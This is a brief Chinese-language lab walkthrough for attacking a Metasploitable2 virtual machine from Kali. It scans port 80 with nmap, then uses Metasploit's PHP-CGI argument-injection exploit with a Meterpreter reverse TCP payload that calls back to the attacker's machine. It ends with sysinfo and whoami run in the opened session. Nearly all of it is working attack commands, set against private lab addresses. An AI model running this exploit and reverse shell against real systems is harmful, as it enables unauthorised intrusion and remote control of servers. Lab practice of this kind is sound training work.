从 Kali 中确定 Metasploitable 的 IP:
ip a
例如:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
检查端口和服务:
nmap -p 80 192.168.56.102
也可以在浏览器中检查:
msfconsole
search php cgi
正确模块:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
选择 Payload:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
检查一下:
show options
run
或
exploit
如果成功:
Meterpreter session 1 opened
sysinfo
whoami